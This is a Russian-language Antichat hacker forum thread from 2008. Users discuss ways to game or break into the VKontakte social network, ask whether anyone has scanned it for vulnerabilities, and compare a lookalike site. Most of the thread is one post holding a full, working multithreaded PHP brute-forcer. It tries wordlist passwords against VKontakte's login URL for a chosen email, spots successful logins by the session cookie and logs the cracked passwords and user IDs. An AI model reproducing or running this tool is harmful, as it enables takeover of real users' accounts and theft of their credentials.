Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

29.03.2008, 15:09
|
|
Moderator - Level 7
Регистрация: 29.02.2008
Сообщений: 935
Провел на форуме: 7007866
Репутация:
1914
|
|
Хм... Значит искусственно поднять нельзя!? И хотите сказать нет никакой дыры - через которое можно это сделать!?
указывают в настройках как человека из-за которого ты пришел в контакт.
= а это где!?
Последний раз редактировалось AlexV; 29.03.2008 в 15:13..
|
|
|

29.03.2008, 19:38
|
|
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме: 2590715
Репутация:
659
|
|
AlexV
Ты пишешь в теме таку чушь, что лучше б вообще ничего не писал.
|
|
|

29.03.2008, 22:56
|
|
Участник форума
Регистрация: 15.09.2007
Сообщений: 141
Провел на форуме: 473570
Репутация:
81
|
|
Сообщение от diehard
AlexV
Ты пишешь в теме таку чушь, что лучше б вообще ничего не писал.
поностью согласен
Сообщение от AlexV
Хм... Значит искусственно поднять нельзя!? И хотите сказать нет никакой дыры - через которое можно это сделать!?
= а это где!?
это в "пригласить друзей"
прочитав последние посты, отвечу всем:
через оперу никак нельзя-нет никакой связи между добавлением в базу после отправки смски и скриптом со стороны клиента-нужно просто саму теорию php знать-сначала скрипт обрабатывается на сервере, а только потом страницу видит юзер
|
|
|

30.03.2008, 02:57
|
|
Новичок
Регистрация: 22.08.2003
Сообщений: 4
Провел на форуме: 18534
Репутация:
1
|
|
измените за банальный вопрос !
но кто-нибуть сканером на баги и уязвимости сканил вконтак .... или просто сервер на котором он лежит ?
вот я скажу честно не пробовал потому что меня напрягают слухи про Ф з Б !!! если кто сканил поделитесь опытом что вышло ))
|
|
|

30.03.2008, 06:43
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
разсмотрим..)
PHP код:
#!/usr/bin/php
<?
$mail = "zell@smtp.ru"; // that's mail for brute
define(_dictf,"words.txt"); // file where placed passwords (splited by \r\n)
define(_logfile,"log.txt"); // file to dump results
define(_queue,100); // how mutch thread's start? (for me best results on 200<= threads...)
define(_sock_test_,true); // posible lagging test ( on bad line's ) ;/
/*
define(_proxy_use_)
define(_proxy_host_)
define(_proxy_port_)
define(_proxy_type_)
define(_proxy_login_)
define(_proxy_passw_)
$stat = new statistic(); // not curently realeased (todo)*/
define(_loghead,
"[-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-]\r\n
[................................................................................................]\r\n
[................................................................................................]\r\n
[................................................................................................]\r\n
[................................................................................................]\r\n
[..............................................................].................................]\r\n
[................................................................................................]\r\n
[................................................................................................]\r\n
[................................................................................................]\r\n
[................................................................................................]\r\n
[................................................................................................]\r\n
[-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-]\r\n
_.-x={[Started in ".$stat->start." by unix time...]}=x-._
\r\n\r\n
[-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-]\r\n");
class queue
{
var $_mail;
var $pases;
var $ipass;
var $result;
var $result_i;
var $return;
var $trouble;
var $nbug;
function queue($mail,$pass)
{
$this -> result_i = 0;
$this -> debug_i = 0;
$this -> count_result;
$this -> _mail = $mail;
$this -> pases = $pass;
$this -> ipass = $pass;
}
function getback()
{
return $this -> result;
}
function init()
{
// echo "init()::";
while($this -> getqueue() == true)
{
// echo "Restarting...\r\n";
};
}
function getqueue()
{
// echo "getqueue()::";
list ($return,$trouble,$nbug) = $this -> combine($this -> _mail,$this -> ipass);
$resu = $this -> result_i + count($return);
for ($i = $this -> result_i; $i < $resu; $i++)
{
$this -> result[$i] = $return[$i];
};
if ($trouble)
{
$this -> debug[$this -> debug_i] = "Found trouble.. try to do something...";
$this -> debug_i ++;
for ($a = 0 ; $a < count($nbug); $a++)
{
$ipass[$a] = $nbug[$a];
};
// echo "Rotating...";
};
$this -> nbug = $nbug;
return ($trouble);
}
function c_h($mail,$pass)
{
$ch = curl_init("http://vkontakte.ru/login.php?email=".$mail."&pass=".$pass);
if ($ch)
{
curl_setopt($ch ,CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)');
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1);
curl_setopt($ch, CURLOPT_OPERATIONTIMEOUT, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST,"HEAD");
curl_setopt($ch, CURLOPT_MUTE, true);
};
return $ch;
}
function combine($mail,$pass)
{
$count = count($pass);
$mh = curl_multi_init();
$trouble = false;
$trouble_i = 0;
for ($i = 0; $i < $count; $i++)
{
$conn[$i] = $this -> c_h($mail,$pass[$i]);
curl_multi_add_handle ($mh,$conn[$i]);
}
do {
$mrc = curl_multi_exec($mh, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
while ($active and $mrc == CURLM_OK) {
// wait for network
if (curl_multi_select($mh) != -1) {
// pull in any new data, or at least handle timeouts
do {
$mrc = curl_multi_exec($mh, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
}
}
if ($mrc != CURLM_OK) {
print "Curl multi read error $mrc\n";
}
// retrieve data
for ($i = 0 ; $i < $count; $i++)
{
if (($err = curl_error($conn[$i])) == '') {
$ret[$i]=curl_multi_getcontent($conn[$i]);
} else {
// echo curl_error($conn[$i])."\r\n";
$trouble = true;
$bug = array ($i, curl_error($conn[$i]));
$nbug[$trouble_i] = $bug;
$trouble_i++;
$this -> debug[$this -> debug_i] = "Connection trouble while try: [".$pass[$i]."] trouble is [".curl_error($conn[$i])."]";
$this -> debug_i++;
}
curl_multi_remove_handle($mh,$conn[$i]);
};
@curl_close($conn[$i]);
curl_multi_close($mh);
return array($ret,$trouble,$nbug);
}
};
class statistic
{
var $start;
function statistic()
{
$this -> start = date("U");
}
function stop()
{
$now = date("U");
$now = $now - $this -> start;
return $now;
}
};
$stat = new statistic();
class found
{
var $_mail;
var $pass;
var $id;
var $all;
var $hash;
var $fp;
function found()
{}
function init()
{
$this -> all = 0;
$this -> fp = fopen(_logfile,"w");
fputs($this->fp,_loghead);
}
function show()
{
for ($i = 0; $i < $this -> all; $i++)
{
$var = "--[ ".$i." ]--------------------------------------------------------------\r\n"
. "[|] Email : " . $this->_mail[$i]."\r\n"
. "[|] Passwd : " . $this-> pass[$i]."\r\n"
. "[|] UsrID : " . $this->id[$i]."\r\n"
. "[!] md5hash: " . $this->hash[$i]."\r\n"
. "[+]------------------------------------------------------------------\r\n\r\n";
echo $var;
fputs($this -> fp,$var);
};
}
function add($mail,$pass,$id)
{
$this -> _mail[$this -> all] = $mail;
$this -> pass[$this -> all] = $pass;
$this -> id[$this -> all] = $id;
$this -> hash[$this -> all] = md5($pass);
$this -> all++;
}
};
class statusbar
{
var $onepercent;
function statusbar($full)
{
$this -> onepercent = ( $full / 100);
}
function show($num,$found)
{
// system('clear');
$perc = $num / $this -> onepercent;
$now = "\r[_".round($perc)."%_] [".$found." Founded] [Complete... i'm running...]";
echo $now;
}
};
class parser
{
var $answer;
var $http_answ;
var $found;
var $id;
function parser($answer)
{
$this -> found = false;
$this -> answer = $answer;
$arr = explode("\r\n",$this -> answer);
$this -> http_answ = $arr["0"];
for ($i = 0; $i < count($arr); $i++)
{
if (eregi("Cookie",$arr[$i]))
{
$mycookie = explode(" ",$arr[$i]);
$temp0 = explode("=",$mycookie[1]);
if ($temp0["0"] == "remixmid")
{
$this -> id = eregi_replace(";","",$temp0["1"]);
if ($this -> id != "deleted")
{
$this -> found = true;
};
}
}else{
// $arrs = explode(": ",$arr[$i]);
// var_dump($arrs);
// тут мы можем проверить наличие Location в ответе... воможно будет быстрее чем вышеописаное
}
};
}
};
function do_scan($mail,$obj)
{
$dictf = fopen(_dictf,"r");
while(!feof($dictf)) {$buff = $buff . fread($dictf,4096);};
$pass = explode("\n",$buff);
$bar = new statusbar(count($pass));
for ($word = 0; $word < count($pass); $word++)
{
$bar -> show($word,$obj -> all);
$a = 0;
for ($a = 0 ; $a < _queue; $a++)
{
// echo "$argc[$a] = $pass[$a] \r\n";
$argc[$a] = $pass[$word];
// echo "pass2queue:: [ ".$argc[$a] ." is ".$word." word ]\r\n";
$word++;
};
$bob = new queue ($mail, $argc);
$bar -> show($word,$obj -> all);
$bob -> init();
$array = $bob -> getback();
$c = 0;
for ($c = 0; $c < count ($array) ; $c++)
{
// var_dump($array[$c]); вывести возврат от курла
$f = new parser($array[$c]);
if ($f -> found)
{
$obj -> add($mail,$argc[$c],$f -> id);
};
};
/*
$me = new req($mail,$pass[$word]);
if ($me -> found)
{
$obj -> add ($me -> login, $me -> pass, $me -> id);
};
*/
};
return $obj;
};
function test()
{
echo "[ Prestart testing... ] Resolving www.vkontakte.ru...";
if(!@gethostbyname("www.vkontakte.ru")) { echo "[ Error ]\r\n";exit(); };
echo "[ Ok ]\r\n";
echo "[ Prestart testing... ] Resolving vkontakte.ru...";
if(!@gethostbyname("vkontakte.ru")) { echo "[ Error ]\r\n"; exit(); };
echo "[ Ok ]\r\n";
echo "[ Testing network.... ] (by sockopen())...";
if(!@fsockopen("vkontakte.ru",80)) { echo "[ Error ]\r\n"; exit();};
echo "[ Ok ]\r\n";
echo "[ Testing curl...] ...";
if (!function_exists("curl_init")) { echo "[ Error ]\r\nTry install curl support visit php.net for more information..."; exit();};
echo "[ Ok ]\r\n";
echo "[ Testing curl version... ] ...";
if (!function_exists("curl_multi_exec")) { echo "[ Error ]\r\nTry install newest curl version for more support visit php.net for more information...\r\nCannot run multi thread, exiting...\r\n"; exit();};
echo "[ Ok ]\r\n";
echo "[ All looks like on my linux box... pretty good ;] ]\r\n[ so let's try hack that motherfucker...]\r\n";
echo "[ Testing wordlist file for open ] With fopen() ...";
if (!fopen(_dictf,"r")) { echo "[ Error ]\r\n"; exit(); };
echo "[ Ok ]\r\n";
echo "[ Testing fopen() for write log...] ...";
if (!fopen(_logfile,"w")) { echo "[ Error ]\r\n"; exit(); };
echo "[ Ok ]\r\n";
};
test();
$obj = new found();
$obj -> init();
$obj = do_scan($mail,$obj);
echo "\r\n";
$obj -> show();
?>
|
|
|

30.03.2008, 12:15
|
|
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
Провел на форуме: 883446
Репутация:
82
|
|
http://www.navstreche.com/ еще 1 сайтик , очен напоминает контакт
|
|
|

30.03.2008, 13:11
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме: 645316
Репутация:
327
|
|
mazaxaka сдесь скорее всего снят шаблон хтмл нежели сам двиг...
|
|
|

30.03.2008, 14:03
|
|
Участник форума
Регистрация: 15.09.2007
Сообщений: 141
Провел на форуме: 473570
Репутация:
81
|
|
Сообщение от mazaxaka
http://www.navstreche.com/ еще 1 сайтик , очен напоминает контакт
это просто сайт, сделанный наподобие вконтакте, но реально очень похоже
мне очень понравились пароль если забыли код активации если не получили  DDD
|
|
|

30.03.2008, 19:38
|
|
Участник форума
Регистрация: 04.11.2007
Сообщений: 103
Провел на форуме: 548128
Репутация:
104
|
|
to sabe
а копирайты не хорошо убирать...
зы сорь если ты и есть zell 
|
|
|

30.03.2008, 20:11
|
|
Новичок
Регистрация: 21.03.2008
Сообщений: 29
Провел на форуме: 326899
Репутация:
6
|
|
sabe, а что это, брут? 
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|